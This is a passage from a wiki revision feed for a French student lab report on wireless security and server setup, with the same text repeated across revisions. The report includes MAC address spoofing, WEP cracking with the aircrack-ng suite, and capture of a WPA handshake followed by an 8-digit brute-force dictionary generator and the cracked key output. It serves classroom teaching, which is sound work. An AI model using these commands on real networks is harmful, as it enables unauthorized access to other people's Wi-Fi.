&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois le handshak est obtenus, on cree un dictionnaire pour le bruteforce sur notre cle wpa, pour cela on cree un petit programme en C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
int cpt = 0;&lt;br /&gt;
for(cpt=0;cpt&amp;lt;99999999;cpt++){&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,cpt);&lt;br /&gt;
}&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On execute le programme en redirigeant sa sortie vers le fichier dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./bruteforce &amp;gt; dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
une fois le dictionnaire est créer, on utilise aircrack-ng ainsi que notre fichier capture(avec le handshak)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [00:58:47] 12399908 keys tested (3597.80 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399905 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 10 F5 F9 6D F5 5D 9A D7 66 CE 4D 59 A7 28 E8 FC &lt;br /&gt;
                       AF FD 13 C5 BF 80 CC AB 1E 72 7F 8F 07 36 3E E5 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : FD 23 BE EE 18 CA 1E 70 D5 E8 2A 44 0A B7 08 7C &lt;br /&gt;
                       CD BA E5 A4 5A 34 EE 2F B4 13 2A 20 81 A7 7A 1B &lt;br /&gt;
                       3E 5A E1 14 D6 4D B9 0B FA 71 D1 C7 FF 01 FE F9 &lt;br /&gt;
                       3A 24 2A F3 91 6F C5 AA 5A 93 6D 64 F9 BC 59 68 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : DE 44 15 8A 67 04 2C FD 62 79 93 1F 08 7B 34 D6 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, qhelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l'access root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console Werewolf&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; installer le mail server &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 vi /etc/aliases =&amp;gt; ajout de : admin:         root&lt;br /&gt;
 apt-get install mailx&lt;br /&gt;
 apt-get install bsd-mailx&lt;br /&gt;
 newaliases // recompiler les alias&lt;br /&gt;
 mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  155  cat /root/mbox &lt;br /&gt;
  156  nano /root/mbox &lt;br /&gt;
  157  nano dragon.crt&lt;br /&gt;
  158  ls&lt;br /&gt;
  159  nano gandi.cert&lt;br /&gt;
  160  mv dragon.crt dragon.cert&lt;br /&gt;
  161  ls&lt;br /&gt;
  162  ls&lt;br /&gt;
  163  vi /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  164  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  165  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  166  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  167  nano /etc/apache2/sites-available/000-default.conf &lt;br /&gt;
  168  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  169  ls&lt;br /&gt;
  170  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  171  mv gandi.cert gandi.crt &lt;br /&gt;
  172  mv dragon.cert dragon.crt &lt;br /&gt;
  173  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  174  a2ensite 000-domain.tld-ssl&lt;br /&gt;
  175  a2ensite /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  176  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  177  a2ensite /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  178  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  179  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  180  ls&lt;br /&gt;
  181  cd /etc/apache2/sites-available/&lt;br /&gt;
  182  ls -l&lt;br /&gt;
  183  mv 000-domain.tld-ssl 000-domain.tld-ssl.conf&lt;br /&gt;
  184  ls -l&lt;br /&gt;
  185  a2ensite 000-domain.tld-ssl&lt;br /&gt;
  186  a2enmod ssl&lt;br /&gt;
  187   service apache2 reload&lt;br /&gt;
  188  netstat -tpln&lt;br /&gt;
  189  ls&lt;br /&gt;
  190  vi 000-domain.tld-ssl.conf&lt;br /&gt;
  191  mkdir /var/www/www.loveandpeace.lol/&lt;br /&gt;
  192  vi /var/www/www.loveandpeace.lol/index.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23100</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23100"/>
				<updated>2015-11-20T10:49:21Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connection série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l'accés au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d'accés afin qu'il autorise l'accés a certaine adresse mac et bloque le reste/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00015.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et ensuite lancé une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Crackage de la cle wpa&amp;lt;/h4&amp;gt;&lt;br /&gt;
la particularité de ce crackage est le fait de trouver le handshak :&lt;br /&gt;
Pour cela on commance par la ligne de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng -w out --encrypt wpa -c 11 --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois le handshak est obtenus, on cree un dictionnaire pour le bruteforce sur notre cle wpa, pour cela on cree un petit programme en C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
int cpt = 0;&lt;br /&gt;
for(cpt=0;cpt&amp;lt;99999999;cpt++){&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,cpt);&lt;br /&gt;
}&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On execute le programme en redirigeant sa sortie vers le fichier dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./bruteforce &amp;gt; dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
une fois le dictionnaire est créer, on utilise aircrack-ng ainsi que notre fichier capture(avec le handshak)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [00:58:47] 12399908 keys tested (3597.80 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399905 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 10 F5 F9 6D F5 5D 9A D7 66 CE 4D 59 A7 28 E8 FC &lt;br /&gt;
                       AF FD 13 C5 BF 80 CC AB 1E 72 7F 8F 07 36 3E E5 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : FD 23 BE EE 18 CA 1E 70 D5 E8 2A 44 0A B7 08 7C &lt;br /&gt;
                       CD BA E5 A4 5A 34 EE 2F B4 13 2A 20 81 A7 7A 1B &lt;br /&gt;
                       3E 5A E1 14 D6 4D B9 0B FA 71 D1 C7 FF 01 FE F9 &lt;br /&gt;
                       3A 24 2A F3 91 6F C5 AA 5A 93 6D 64 F9 BC 59 68 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : DE 44 15 8A 67 04 2C FD 62 79 93 1F 08 7B 34 D6 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, qhelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l'access root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console Werewolf&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; installer le mail server &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 vi /etc/aliases =&amp;gt; ajout de : admin:         root&lt;br /&gt;
 apt-get install mailx&lt;br /&gt;
 apt-get install bsd-mailx&lt;br /&gt;
 newaliases // recompiler les alias&lt;br /&gt;
 mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23098</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23098"/>
				<updated>2015-11-20T10:36:15Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connection série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l'accés au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d'accés afin qu'il autorise l'accés a certaine adresse mac et bloque le reste/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00015.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et ensuite lancé une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
